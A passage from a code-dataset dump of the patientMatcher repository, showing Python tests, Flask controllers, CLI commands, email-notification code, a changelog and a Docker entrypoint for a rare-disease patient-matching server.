server containing human build 37\"\"\"\n client = ensembl_api.EnsemblRestApiClient()\n data = client.ping_server()\n assert data == {'ping':1}\n\ndef test_ping_ensemble_38():\n \"\"\"Test ping ensembl server containing human build 38\"\"\"\n client = ensembl_api.EnsemblRestApiClient(build='38')\n data = client.ping_server()\n assert data == {'ping':1}\n\ndef test_send_gene_request():\n \"\"\"Test send request with correct params and endpoint\"\"\"\n url = 
'https://grch37.rest.ensembl.org/lookup/id/ENSG00000103591'\n client = ensembl_api.EnsemblRestApiClient()\n data = client.send_request(url)\n # get info for the ensembl gene\n assert data['display_name'] == 'AAGAB'\n\ndef test_send_request_wrong_url():\n \"\"\"Successful requests are tested by other tests in this file.\n This test will trigger errors instead.\n \"\"\"\n url = 'fakeyurl'\n client = ensembl_api.EnsemblRestApiClient()\n data = client.send_request(url)\n assert type(data) == ValueError\n\n url = 'https://grch37.rest.ensembl.org/fakeyurl'\n data = client.send_request(url)\n assert type(data) == HTTPError\n" }, { "alpha_fraction": 0.6837624907493591, "alphanum_fraction": 0.712279200553894, "avg_line_length": 46.948978424072266, "blob_id": "db97189e1f0fa938e54e4bde841e9c81d8dbb144", "content_id": "78cec800e73291db4a6cbdab2990955d40c995a4", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4699, "license_type": "permissive", "max_line_length": 141, "num_lines": 98, "path": "/tests/match/test_pheno_matching.py", "repo_name": "ousamg/patientMatcher", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\nfrom patientMatcher.match.phenotype_matcher import match, similarity_wrapper\nfrom patientMatcher.parse.patient import mme_patient\nfrom patientMatcher.resources import path_to_hpo_terms, path_to_phenotype_annotations\nfrom patient_similarity import HPO, Diseases, HPOIC, Patient\nfrom patient_similarity.__main__ import compare_patients\n\nPHENOTYPE_ROOT = 'HP:0000118'\n\ndef test_patient_similarity_wrapper():\n \"\"\"test the wrapper around this repo: https://github.com/buske/patient-similarity\"\"\"\n\n # Create the information-content functionality for the HPO\n hpo = HPO(path_to_hpo_terms, new_root=PHENOTYPE_ROOT)\n assert hpo\n diseases = Diseases(path_to_phenotype_annotations)\n assert diseases\n hpoic = HPOIC(hpo, diseases, orphanet=None, patients=False, 
use_disease_prevalence=False,\n use_phenotype_frequency=False, distribute_ic_to_leaves=False)\n assert hpoic\n\n query_p_terms = ['HP:0008058', 'HP:0007033', 'HP:0002194', 'HP:0002281'] # nervous system - related HPO terms\n\n # test wrapper by providing same terms for query patient and match patient:\n score = similarity_wrapper(hpoic=hpoic, hpo=hpo, max_hpo_score=1.0, hpo_terms_q=query_p_terms, hpo_terms_m=query_p_terms)\n # score should be something like 0.9999999999999999\n assert round(score,12) == 1\n\n match_p_terms = ['HP:0008058', 'HP:0007033', 'HP:0002194']\n\n # test wrapper by providing almost the same terms for query patient and match patient:\n related_pheno_score = similarity_wrapper(hpoic=hpoic, hpo=hpo, max_hpo_score=1.0, hpo_terms_q=query_p_terms, hpo_terms_m=match_p_terms)\n # similarity score should be lower, but still around 1\n assert round(related_pheno_score,2) < score\n assert related_pheno_score > 0.8\n\n # provide completely different HPO terms for matching patient\n match_p_terms = ['HP:0003002', 'HP:0000218'] # breast cancer and high palate phenotypes\n unrelated_pheno_score = similarity_wrapper(hpoic=hpoic, hpo=hpo, max_hpo_score=1.0, hpo_terms_q=query_p_terms, hpo_terms_m=match_p_terms)\n # then unrelated_pheno_score should be almost 0\n assert round(unrelated_pheno_score,2) == 0\n\n # but still a positive number\n assert unrelated_pheno_score >0\n\n\ndef test_phenotype_matching(gpx4_patients, database):\n \"\"\"test the algorithm that compares the phenotype of a query patient against the database\"\"\"\n\n # insert 2 test patients into test database\n for patient in gpx4_patients:\n database['patients'].insert_one(patient)\n assert len(list(database['patients'].find())) == 2\n\n query_patient = gpx4_patients[0]\n assert query_patient\n\n # this patient has HPO terms and OMIM diagnosis\n formatted_patient = mme_patient(query_patient)\n assert len(formatted_patient['features']) > 0\n assert len(formatted_patient['disorders']) > 0\n\n 
matches_HPO_OMIM = match(database, 0.75, formatted_patient['features'], formatted_patient['disorders'])\n assert len(matches_HPO_OMIM.keys()) == 2\n for key,value in matches_HPO_OMIM.items():\n assert 'patient_obj' in value\n assert value['pheno_score'] > 0\n\n features = formatted_patient['features']\n disorders = formatted_patient['disorders']\n # remove HPO terms from the query patient, test that the algorithm works anyway\n # because matching will use OMIM disorders\n formatted_patient['features'] = []\n matches_OMIM = match(database, 0.75, formatted_patient['features'], formatted_patient['disorders'])\n assert len(matches_OMIM.keys()) > 0 and len(matches_OMIM.keys()) < 50\n for key,value in matches_OMIM.items():\n assert 'patient_obj' in value\n assert value['pheno_score'] > 0\n\n # remove the OMIM diagnosis from patient object. The algorithm should work\n # but it shouldn't return any match\n formatted_patient['disorders'] = []\n matches_no_phenotypes = match(database, 0.75, formatted_patient['features'], formatted_patient['disorders'])\n assert len(matches_no_phenotypes.keys()) == 0\n\n # Add again features. 
The algorithm works again because HPO terms will be used\n formatted_patient['features'] = features\n matches_HPO = match(database, 0.75, formatted_patient['features'], formatted_patient['disorders'])\n assert len(matches_HPO.keys()) == 2\n for key,value in matches_HPO.items():\n assert 'patient_obj' in value\n assert value['pheno_score'] > 0\n\n # make sure that matches obtained when OMIM and HPO terms are present are more or equal than\n # when either of these phenotype terms is present by itself\n assert len(matches_HPO_OMIM.keys()) >= len(matches_OMIM.keys())\n assert len(matches_HPO_OMIM.keys()) >= len(matches_HPO.keys())\n" }, { "alpha_fraction": 0.6305732727050781, "alphanum_fraction": 0.6369426846504211, "avg_line_length": 21.428571701049805, "blob_id": "23b33ba61593f62aa56c0e8b9a84041c7824d875", "content_id": "200fe73b75ef23770a10725dc3b36e5a8e1a0031", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 157, "license_type": "permissive", "max_line_length": 49, "num_lines": 7, "path": "/tests/server/test_create_app.py", "repo_name": "ousamg/patientMatcher", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\ndef test_create_app(mock_app):\n \"\"\"Tests the function that creates the app\"\"\"\n\n assert mock_app.client\n assert mock_app.db\n" }, { "alpha_fraction": 0.6896946430206299, "alphanum_fraction": 0.6919847130775452, "avg_line_length": 38.69696807861328, "blob_id": "a9c1d98163c63b2d5b257bf97e956747dc1610e0", "content_id": "90c2cfa5e10cd78a7f896171adbc3b318275ffe9", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2620, "license_type": "permissive", "max_line_length": 124, "num_lines": 66, "path": "/patientMatcher/cli/remove.py", "repo_name": "ousamg/patientMatcher", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport click\nfrom flask.cli import with_appcontext, 
current_app\n\nfrom patientMatcher.utils.delete import delete_by_query\n\[email protected]()\ndef remove():\n \"\"\"Remove items from database using the CLI\"\"\"\n pass\n\[email protected]()\[email protected]('-id', type=click.STRING, nargs=1, required=False, help=\"ID of the patient to be removed from database\")\[email protected]('-label', type=click.STRING, nargs=1, required=False, help=\"Label of the patient to be removed from database\")\[email protected]('-remove_matches/-leave_matches', default=False, help=\"Remove or leave on db matches triggered by patient\")\n@with_appcontext\ndef patient(id, label, remove_matches):\n \"\"\"Removing a patient from patientMatcher providing its ID\"\"\"\n\n if not id and not label:\n click.echo('Error: either ID and/or label should be provided to delete a patient.')\n raise click.Abort()\n\n if remove_matches and not id:\n click.echo('Please provide patient ID and not label to remove all its matches.')\n raise click.Abort()\n\n query = {}\n if id:\n query['_id'] = id\n if label:\n query['label'] = label\n\n n_removed = delete_by_query(query=query, mongo_db= current_app.db, mongo_collection='patients')\n click.echo('Number of patients removed from database:{}'.format(n_removed))\n\n if remove_matches:\n # this will remove ONLY matches where this patient was the query patient\n # NOT those where patient was among the matching results\n query = {'data.patient.id' : id}\n n_removed = delete_by_query(query=query, mongo_db= current_app.db, mongo_collection='matches')\n click.echo('Number of matches for this patient removed from database:{}'.format(n_removed))\n\n\[email protected]()\[email protected]('-id', type=click.STRING, nargs=1, required=True, help=\"ID of the client to be removed from database\")\n@with_appcontext\ndef client(id):\n \"\"\"Remove a client from database by providing its ID\"\"\"\n\n query = {'_id' : id}\n n_removed = delete_by_query(query=query, mongo_db= current_app.db, mongo_collection='clients')\n 
click.echo('Number of clients removed from database:{}'.format(n_removed))\n\n\[email protected]()\[email protected]('-id', type=click.STRING, nargs=1, required=True, help=\"ID of the node to be removed from database\")\n@with_appcontext\ndef node(id):\n \"\"\"Remove a node from database by providing its ID\"\"\"\n\n query = {'_id' : id}\n n_removed = delete_by_query(query=query, mongo_db= current_app.db, mongo_collection='nodes')\n click.echo('Number of nodes removed from database:{}'.format(n_removed))\n" }, { "alpha_fraction": 0.6408839821815491, "alphanum_fraction": 0.7099447250366211, "avg_line_length": 17.564102172851562, "blob_id": "3c8a65977ce3c99f229ef6c2521130d2bb6f87c0", "content_id": "1817706510598f7d291c7cb52472cd82807e7b68", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1448, "license_type": "permissive", "max_line_length": 96, "num_lines": 78, "path": "/CHANGELOG.md", "repo_name": "ousamg/patientMatcher", "src_encoding": "UTF-8", "text": "## [2.2] - 2020-10-19\n\n### Added\n- Codeowners document\n\n### Fixed\n- Avoid pymongo-related deprecated code\n- Unblock pytest and mongomock dependencies\n\n\n## [2.1]\n\n### Modified\n- Open up metrics endpoint for any request (no token needed)\n\n### Fixed\n- Update HPO file name to reflect resource on compbio.charite.de/jenkins\n\n\n## [2.0] - 2019-11-17\n\n### Modified\n- Ensembl gene IDs to describe gene IDs\n- Allow matching when external patients have entrez gene IDs or HGNC symbols\n- Display contact email in notification emails\n- Save to database only matches with results or error messages\n\n\n## [1.4] - 2019-11-06\n\n### Modified\n- Allow gene search using ensembl gene IDs\n\n\n\n## [1.3] - 2019-10-31\n\n### Fixed\n- Handle better external matching errors\n- Fix a bug introduced in version 1.2.0 (missing patient id in results)\n\n\n\n## [1.2.1] - 2019-10-30\n\n### Modified\n- Remove Host from external request headers for 
compatibility issues\n\n\n\n## [1.2.0] - 2019-10-29\n\n### Added\n- Introduced SCORE_THRESHOLD parameter as a minimum patient score threshold for returned results\n\n### Modified\n- Command line returns app version\n\n\n\n## [1.1.1] - 2019-04-25\n\n### Modified\n- Fixed bug in phenotype matching when no OMIM or no HPO terms are available\n\n\n\n## [1.1.0] - 2019-04-25\n\n### Modified\n- patient-similarity against all patients in database if query patient has HPO term\n\n\n\n## [1.0.0] - 2019-04-18\n\n### Added\n- patient-similarity integration for phenotype scoring\n" }, { "alpha_fraction": 0.6731128692626953, "alphanum_fraction": 0.6756400465965271, "avg_line_length": 49.0054931640625, "blob_id": "b95fbb2fd0dfa8f38526fac180c263dd8654dab0", "content_id": "cef2f4497d0b7586cf48831db5b4c9fc8b670ea8", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 9101, "license_type": "permissive", "max_line_length": 140, "num_lines": 182, "path": "/patientMatcher/utils/notify.py", "repo_name": "ousamg/patientMatcher", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\nimport logging\nfrom flask_mail import Message\n\nLOG = logging.getLogger(__name__)\n\n\ndef notify_match_internal(database, match_obj, admin_email, mail, notify_complete):\n \"\"\"Send an email to patient contacts after an internal match\n\n Args:\n database(pymongo.database.Database): patientMatcher database\n match_obj(dict): an object containing both query patient(dict) and matching results(list)\n admin_email(str): email of the server admin\n mail(flask_mail.Mail): an email instance\n notify_complete(bool): set to False to NOT notify variants and phenotype terms by email\n \"\"\"\n # Internal matching can be triggered by a patient in the same database or by a patient on a connected node.\n # In the first case notify both querier contact and contacts in the result patients.\n # in the second case notify only contacts from patients in the 
results list.\n sender = admin_email\n patient_id = None\n patient_label = None\n results = None\n recipient = None\n email_subject = 'MatchMaker Exchange: new patient match available.'\n email_body = None\n\n # check if query patient already belongs to patientMatcher database:\n internal_patient = database['patients'].find_one({'_id':match_obj['data']['patient']['id']})\n if internal_patient:\n #If patient used for the search is in patientMatcher database, notify querier as well:\n patient_id = match_obj['data']['patient']['id']\n patient_label = match_obj['data']['patient'].get('label')\n recipient = match_obj['data']['patient']['contact']['href'][7:]\n email_body = active_match_email_body(patient_id=patient_id, match_results=match_obj['results'], patient_label=patient_label,\n external_match=False, notify_complete=notify_complete)\n LOG.info('Sending an internal match notification for query patient with ID:{0}. Patient contact: {1}'.format(patient_id, recipient))\n\n kwargs = dict(subject=email_subject, html=email_body, sender=sender, recipients=[recipient])\n message = Message(**kwargs)\n # send email using flask_mail\n try:\n mail.send(message)\n except Exception as err:\n LOG.error('An error occurred while sending an internal match notification: {}'.format(err))\n\n # Loop over the result patients and notify their contact about the matching with query patient\n for result in match_obj['results'][0]['patients']: #this list has only one element since there is only one internal node\n\n patient_id = result['patient']['id']\n\n # do not notify when patient in results is the same as the one used for query\n if internal_patient and internal_patient['_id'] == patient_id:\n continue\n\n patient_label = result['patient'].get('label')\n recipient = result['patient']['contact']['href'][7:]\n email_body = passive_match_email_body(patient_id, match_obj['data']['patient'], patient_label, notify_complete)\n LOG.info('Sending an internal match notification for match result 
with ID {}'.format(patient_id))\n\n kwargs = dict(subject=email_subject, html=email_body, sender=sender, recipients=[recipient])\n message = Message(**kwargs)\n # send email using flask_mail\n try:\n mail.send(message)\n except Exception as err:\n LOG.error('An error occurred while sending an internal match notification: {}'.format(err))\n\n\ndef notify_match_external(match_obj, admin_email, mail, notify_complete):\n \"\"\"Send an email to patients contacts to notify a match on external nodes\n\n Args:\n match_obj(dict): an object containing both query patient(dict) and matching results(list)\n admin_email(str): email of the server admin\n mail(flask_mail.Mail): an email instance\n notify_complete(bool): set to False to NOT notify variants and phenotype terms by email\n \"\"\"\n sender = admin_email\n patient_id = match_obj['data']['patient']['id']\n patient_label = match_obj['data']['patient'].get('label')\n recipient = match_obj['data']['patient']['contact']['href'][7:]\n email_subject = 'MatchMaker Exchange: new patient match available.'\n email_body = active_match_email_body(patient_id=patient_id, match_results=match_obj['results'], patient_label=patient_label,\n external_match=True, notify_complete=notify_complete)\n LOG.info('Sending an external match notification for query patient with ID {0}. 
Patient contact: {1}'.format(patient_id, recipient))\n\n kwargs = dict(subject=email_subject, html=email_body, sender=sender, recipients=[recipient])\n message = Message(**kwargs)\n # send email using flask_mail\n try:\n mail.send(message)\n except Exception as err:\n LOG.error('An error occurred while sending an external match notification: {}'.format(err))\n\n\ndef active_match_email_body(patient_id, match_results, patient_label=None, external_match=False, notify_complete=False):\n \"\"\"Returns the body message of the notification email when the patient was used as query patient\n\n Args:\n patient_id(str): the ID of the patient submitted by the MME user which will be notified\n match_results(list): a list of patients which match with the patient whose contact is going to be notified\n external_match(bool): True == match in connected nodes, False == match with other patients in database\n patient_label(str): the label of the patient submitted by the MME user which will be notified (not mandatory field)\n notify_complete(bool): set to False to NOT notify variants and phenotype terms by email\n\n Returns:\n html(str): the body message\n \"\"\"\n search_type = 'against the internal database of MatchMaker patients'\n if external_match:\n search_type = 'against external nodes connected to MatchMaker'\n\n html = \"\"\"\n ***This is an automated message, please do not reply to this email.***<br><br>\n <strong>MatchMaker Exchange patient matching notification:</strong><br><br>\n Patient with ID <strong>{0}</strong>, label <strong>{1}</strong>.\n This search returned these potential matches</strong>:<br>\n <strong>{2}</strong><br>\n You might directly contact the matching part using the address specified in patient's data or review matching\n results in the portal you used to submit your patient.\n <br><br>\n Kind regards,<br>\n The PatientMatcher team\n \"\"\".format(patient_id, patient_label, html_format(match_results, 0, notify_complete))\n\n return html\n\n\ndef 
passive_match_email_body(patient_id, matched_patient, patient_label=None, notify_complete=False):\n \"\"\"Returns the body message of the notification email when the patient was used as query patient\n\n Args:\n patient_id(str): the ID of the patient submitted by the MME user which will be notified\n matched_patient(dict): a patient object\n patient_label(str): the label of the patient submitted by the MME user which will be notified (not mandatory field)\n notify_complete(bool): set to False to NOT notify variants and phenotype terms by email\n\n Returns:\n html(str): the body message\n \"\"\"\n html = \"\"\"\n ***This is an automated message, please do not reply.***<br>\n <strong>MatchMaker Exchange patient matching notification:</strong><br><br>\n Patient with <strong>ID {0}</strong>,<strong> label {1}</strong> was recently returned as a match result\n in a search performed using a patient with these specifications:<br>\n <strong>{2}</strong><br>\n You might directly contact the matching part using the address specified in patient's data or review matching\n results in the portal you used to submit your patient.\n <br><br>\n Kind regards,<br>\n The PatientMatcher team\n \"\"\".format(patient_id, patient_label, html_format(matched_patient, 0, notify_complete))\n\n return html\n\n\ndef html_format(obj, indent=0, notify_complete=False):\n \"\"\"Formats one or more patient objects to a nice html string\n\n Args:\n obj(list): a list of patient objects or a patient object\n notify_complete(bool): set to False to NOT notify variants and phenotype terms by email\n \"\"\"\n if isinstance(obj, list): # a list pf match results\n htmls = []\n for k in obj:\n htmls.append(html_format(obj=k, indent=indent+1, notify_complete=notify_complete))\n\n return '[<div style=\"margin-left: %dem\">%s</div>]' % (indent, ',<br>'.join(htmls))\n\n if isinstance(obj, dict): # patient object\n htmls = []\n for k,v in obj.items():\n if notify_complete or k in ['node', 'patients', 'patient', 
'contact', 'id', 'name', 'href', 'email', 'institution']:\n htmls.append(\"<span style='font-style: italic; color: #888'>%s</span>: %s\" % (k,html_format(obj=v,indent=indent+1,\n notify_complete=notify_complete)))\n\n return '{<div style=\"margin-left: %dem\">%s</div>}' % (indent, ',<br>'.join(htmls))\n\n return str(obj)\n" }, { "alpha_fraction": 0.6740080118179321, "alphanum_fraction": 0.6799510717391968, "avg_line_length": 34.09815979003906, "blob_id": "efa04cd60054cc6eefe4b231982952bd067fad5e", "content_id": "1ce59f900e69b5627fccb70421dcff7ab9f68a45", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5721, "license_type": "permissive", "max_line_length": 114, "num_lines": 163, "path": "/patientMatcher/server/controllers.py", "repo_name": "ousamg/patientMatcher", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\nimport logging\nfrom flask import jsonify\nfrom jsonschema import ValidationError\nfrom patientMatcher.constants import STATUS_CODES\nfrom patientMatcher.utils.stats import general_metrics\nfrom patientMatcher.utils.delete import delete_by_query\nfrom patientMatcher.utils.patient import patients\nfrom patientMatcher.parse.patient import json_patient, validate_api, mme_patient\nfrom patientMatcher.auth.auth import authorize\nfrom patientMatcher.match.handler import external_matcher\nfrom patientMatcher.__version__ import __version__\n\nLOG = logging.getLogger(__name__)\n\ndef heartbeat(disclaimer):\n \"\"\"Return a heartbeat as defined here:https://github.com/ga4gh/mme-apis/blob/master/heartbeat-api.md\"\"\"\n\n hbeat = {\n \"heartbeat\": {\n \"production\": True,\n \"version\": __version__,\n \"accept\": [\"application/vnd.ga4gh.matchmaker.v1.0+json\", \"application/vnd.ga4gh.matchmaker.v1.1+json\"]\n },\n \"disclaimer\": disclaimer,\n }\n return hbeat\n\n\ndef metrics(database):\n \"\"\"return database metrics\"\"\"\n db_metrics = general_metrics(database)\n return 
db_metrics\n\n\ndef get_nodes(database):\n \"\"\"Get all connected nodes as a list of objects with node_id and node_label as elements\"\"\"\n results = list(database['nodes'].find())\n nodes = []\n for node in results:\n nodes.append( { 'id': node['_id'], 'description': node['label']} )\n return nodes\n\n\ndef patient(database, patient_id):\n \"\"\"Return a mme-like patient from database by providing its ID\"\"\"\n query_patient = None\n query_result = list(patients(database, ids=[patient_id]))\n if query_result:\n query_patient = query_result[0]\n return query_patient\n\n\ndef match_external(database, query_patient, node=None):\n \"\"\"Trigger an external patient matching for a given patient object\"\"\"\n # trigger the matching and save the matching id to variable\n matching_obj = external_matcher(database, query_patient, node)\n # save matching object to database only if there are results or error messages\n if matching_obj and (matching_obj.get('has_matches') or matching_obj.get('errors')):\n database['matches'].insert_one(matching_obj)\n return matching_obj\n\n\ndef check_request(database, request):\n \"\"\"Check if request is valid, if it is return MME formatted patient\n Otherwise return error code.\n \"\"\"\n check_result = None\n\n # check that request is using a valid auth token\n if not authorize(database, request):\n LOG.info(\"Request is not authorized\")\n return 401\n\n try: # make sure request has valid json data\n request_json = request.get_json(force=True)\n except Exception as err:\n LOG.info(\"Json data in request is not valid:{}\".format(err))\n return 400\n\n try: # validate json data against MME API\n validate_api(json_obj=request_json, is_request=True)\n except Exception as err:\n LOG.info(\"Patient data does not conform to API:{}\".format(err))\n return 422\n\n formatted_patient = mme_patient(json_patient=request_json['patient'],\n convert_to_ensembl = True)\n return formatted_patient\n\n\ndef check_async_request(database, request):\n 
\"\"\"Check if an asynchronous request is valid.\n Basically json data must be valid and the query ID should be\n already present in async responses database collection\"\"\"\n\n data = None\n try: # Check if request contains valid data\n data = request.json\n LOG.info('Request data looks valid. Source is {}'.format(data.get('source')))\n except:\n LOG.error('Request data is not valid. Abort')\n return 400\n\n # check if query ID was previously saved into async responses collection\n query_id = data.get('query_id')\n if query_id:\n async_response = database['async_responses'].find_one({'query_id':query_id})\n LOG.info('Async response is {}'.format(async_response))\n if query_id is None or async_response is None:\n LOG.error('Async request not authorized. Abort')\n return 401\n\n resp = data.get('response')\n if resp is None:\n LOG.error(\"Async server did not provide any 'response' object\")\n return 400\n try: # validate json response (results)\n validate_api(json_obj=resp, is_request=False)\n except Exception as err:\n LOG.info(\"Patient data does not conform to API:{}\".format(err))\n return 422\n\n return data\n\n\ndef validate_response(matches):\n \"\"\"Validates patient matching results before sending them away in a response\"\"\"\n\n try: # validate json data against MME API\n validate_api(json_obj=matches, is_request=False)\n except ValidationError as err:\n LOG.info(\"Patient data does not conform to API:{}\".format(err))\n return 422\n return matches\n\n\ndef bad_request(error_code):\n \"\"\"Crete an automatic response based on custom error codes\"\"\"\n message = STATUS_CODES[error_code]['message']\n resp = jsonify(message)\n resp.status_code = error_code\n return resp\n\n\ndef delete_patient(database, patient_id):\n \"\"\"Remove a patient by ID\"\"\"\n message = ''\n\n # first delete all matches in database for this patient:\n query = {'data.patient.id' : patient_id}\n deleted = delete_by_query(query, database, 'matches')\n LOG.info('deleted {} matche/s 
triggered by this patient'.format(deleted))\n\n\n query = {'_id' : patient_id}\n deleted = delete_by_query(query, database, 'patients')\n message = {}\n if deleted == 1:\n message['message'] = 'Patient and its matches were successfully deleted from database'\n else:\n message['message'] = 'ERROR. Could not delete a patient with ID {} from database'.format(patient_id)\n return message\n" }, { "alpha_fraction": 0.663517415523529, "alphanum_fraction": 0.6649709343910217, "avg_line_length": 32.56097412109375, "blob_id": "5b838c10a774c2b6031d47cccd9f04c462cb812d", "content_id": "0588e5fb9659bc3b7fd51d901ddc677b60929c5d", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1376, "license_type": "permissive", "max_line_length": 96, "num_lines": 41, "path": "/patientMatcher/server/__init__.py", "repo_name": "ousamg/patientMatcher", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\nimport os\nfrom pymongo import MongoClient\nimport logging\nfrom flask import Flask\nfrom flask_mail import Mail\nfrom . 
import views\n\nlogging.basicConfig(level=logging.INFO)\nLOG = logging.getLogger(__name__)\n\ndef create_app():\n app = None\n\n try:\n LOG.info('Configuring app from environment variable')\n app = Flask(__name__)\n app.config.from_envvar('PMATCHER_CONFIG')\n except:\n LOG.warning('Environment variable settings not found, configuring from instance file.')\n app_root=os.path.abspath(__file__).split('patientMatcher')[0]\n\n # check if config file exists under ../instance:\n instance_path = os.path.join(app_root,'patientMatcher', 'instance')\n if not os.path.isfile(os.path.join(instance_path,'config.py')): # running app from tests\n instance_path = os.path.join(app_root,'patientMatcher','patientMatcher','instance')\n\n app = Flask(__name__, instance_path=instance_path, instance_relative_config=True)\n app.config.from_pyfile('config.py')\n\n client = MongoClient(app.config['DB_URI'])\n app.client = client\n app.db = client[app.config['DB_NAME']]\n LOG.info('database connection info:{}'.format(app.db))\n\n if app.config.get('MAIL_SERVER'):\n mail = Mail(app)\n app.mail = mail\n\n app.register_blueprint(views.blueprint)\n return app\n" }, { "alpha_fraction": 0.6448140740394592, "alphanum_fraction": 0.6487280130386353, "avg_line_length": 31.967741012573242, "blob_id": "7f643805f6dacacbf7bcf1524e5012f88486b4b8", "content_id": "665c02d22d4491e085c88cce05190372796176e3", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 1022, "license_type": "permissive", "max_line_length": 111, "num_lines": 31, "path": "/docker/entrypoint.sh", "repo_name": "ousamg/patientMatcher", "src_encoding": "UTF-8", "text": "#!/bin/bash -e\n\nCURR_DIR=\"$( cd \"$( dirname \"${BASH_SOURCE[0]}\" )\" && pwd )\"\n\nif [[ -z $(which python) ]]; then\n . 
/opt/conda/etc/profile.d/conda.sh\n conda activate patientMatcher\nfi\n\n# ugly grep, but lets user mount custom `instance/config.py` into image\nDB_USERNAME=$(grep '^DB_USERNAME =' $CURR_DIR/../patientMatcher/instance/config.py | cut -f 3 -d' ' | tr -d \\')\nDB_PASSWORD=$(grep '^DB_PASSWORD =' $CURR_DIR/../patientMatcher/instance/config.py | cut -f 3 -d' ' | tr -d \\')\nDB_NAME=$(grep '^DB_NAME =' $CURR_DIR/../patientMatcher/instance/config.py | cut -f 3 -d' ' | tr -d \\')\n\nSETUP_JS=/root/setup_mongo.js\ncat > $SETUP_JS << EOF\nconn = new Mongo();\ndb = conn.getDB(\"$DB_NAME\");\ndb.disableFreeMonitoring();\ndb.createUser({user: \"$DB_USERNAME\", pwd: \"$DB_PASSWORD\", roles:[\"dbOwner\"]});\nEOF\n\nmongod --fork \\\n --pidfilepath $MONGO_PIDFILE \\\n --logpath $MONGO_LOGPATH --logappend\nmongo $SETUP_JS\n\npmatcher add demodata\npmatcher add client -id test_client -token test_token -url www.test-url.com\n\nexec \"$@\"\n" }, { "alpha_fraction": 0.6828193664550781, "alphanum_fraction": 0.6840780377388, "avg_line_length": 35.52873611450195, "blob_id": "e296b43634c7906576bed8fbaad30589f64a0cd4", "content_id": "7ed32d4480bb3f9755ca082035f9bee813980afe", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3178, "license_type": "permissive", "max_line_length": 118, "num_lines": 87, "path": "/patientMatcher/cli/commands.py", "repo_name": "ousamg/patientMatcher", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport click\nimport pymongo\nfrom pymongo.errors import ConnectionFailure\nfrom flask.cli import FlaskGroup, with_appcontext, current_app\nfrom flask_mail import Message\nfrom patientMatcher.server import create_app\nfrom .add import add\nfrom .remove import remove\nfrom .update import update\nfrom patientMatcher import __version__\n\n\[email protected]_option(__version__)\[email protected](cls=FlaskGroup, create_app=create_app, invoke_without_command=False, 
add_default_commands=True,\n add_version_option=False)\ndef cli(**_):\n \"\"\"Base command for invoking the command line\"\"\"\n pass\n\[email protected]()\ndef test():\n \"\"\"Test server using CLI\"\"\"\n pass\n\n\[email protected]()\n@with_appcontext\ndef name():\n \"\"\"Returns the app name, for testing purposes, mostly\"\"\"\n app_name = current_app.name.split('.')[0]\n click.echo(app_name)\n return app_name\n\n\[email protected]()\n@with_appcontext\[email protected]('-recipient', type=click.STRING, nargs=1, required=True, help=\"Email address to send the test email to\")\ndef email(recipient):\n \"\"\"Sends a test email using config settings\"\"\"\n click.echo(recipient)\n\n subj = 'Test email from patientMatcher'\n body = \"\"\"\n ***This is an automated message, please do not reply to this email.***<br><br>\n If you receive this email it means that email settings are working fine and the\n server will be able to send match notifications.<br>\n A mail notification will be sent when:<br>\n <ul>\n <li>A patient is added to the database and the add request triggers a search\n on external nodes producing at least one result (/patient/add endpoint).</li>\n\n <li>An external search is actively performed on connected nodes and returns\n at least one result (/match/external/<patient_id> endpoint).</li>\n\n <li>The server is interrogated by an external node and returns at least one\n result match (/match endpoint). 
In this case a match notification is sent to\n each contact of the result matches.</li>\n\n <li>An internal search is submitted to the server using a patient from the\n database (/match endpoint) and this search returns at least one match.\n In this case contact users of all patients involved will be notified\n (contact from query patient and contacts from the result patients).</li>\n </ul>\n <br>\n You can stop server notification any time by commenting the MAIL_SERVER parameter in\n config file and rebooting the server.\n <br><br>\n Kind regards,<br>\n The PatientMatcher team\n \"\"\"\n kwargs = dict(subject=subj, html=body, sender=current_app.config.get('MAIL_USERNAME'), recipients=[recipient])\n message = Message(**kwargs)\n try:\n current_app.mail.send(message)\n click.echo('Mail correctly sent. Check your inbox!')\n except Exception as err:\n click.echo('An error occurred while sending test email: \"{}\"'.format(err))\n\ncli.add_command(test)\ntest.add_command(name)\ntest.add_command(email)\ncli.add_command(add)\ncli.add_command(update)\ncli.add_command(remove)\n" }, { "alpha_fraction": 0.6538719534873962, "alphanum_fraction": 0.6588377356529236, "avg_line_length": 36.82233428955078, "blob_id": "4e5c9c86c1a3beb27c8611e1cd38b5fd30d6fbaa", "content_id": "a805a4a3598b7844e061f346d8fe205f5703149d", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7451, "license_type": "permissive", "max_line_length": 117, "num_lines": 197, "path": "/tests/cli/test_commands.py", "repo_name": "ousamg/patientMatcher", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport pymongo\nfrom flask_mail import Message\n\nfrom patientMatcher.cli.commands import cli\nfrom patientMatcher.parse.patient import mme_patient\n\ndef test_appname(mock_app):\n runner = mock_app.test_cli_runner()\n result = runner.invoke(cli, ['test', 'name'])\n assert result.output == 'patientMatcher\\n'\n\n\ndef 
